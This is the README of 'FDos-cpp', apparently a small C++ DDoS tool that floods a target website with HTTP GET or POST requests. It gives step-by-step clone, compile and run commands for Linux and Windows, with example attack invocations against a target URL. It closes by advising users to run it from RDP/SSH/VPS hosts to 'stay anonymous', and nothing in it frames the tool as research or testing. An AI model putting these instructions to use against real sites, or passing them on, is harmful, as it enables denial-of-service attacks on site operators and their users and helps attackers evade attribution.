This version only support method GET and POST
For python version : FDos Python Version
For GCC (g++)
Important! : Make sure curl has been installed on you device
curl installation you can read here : https://everything.curl.dev/get
clone this repository / download
git clone https://github.com/fooster1337/FDos-cpp
cd FDos-cpp
g++ fdos.cpp -o fdos -lcurl
./fdos (for linux)
fdos.exe (for windows)
For Linux / MacOS / Unix Based :
./fdos https://target.com <method>
Example : ./fdos https://target.com get // using GET method
For windows :
fdos.exe https://target.com <method>
Example : fdos.exe https://target.com get // using GET method
this simple DDos Tool does not yet support proxy/IP switching, it is preferable to use RDP/SSH/VPS. stay anonymous!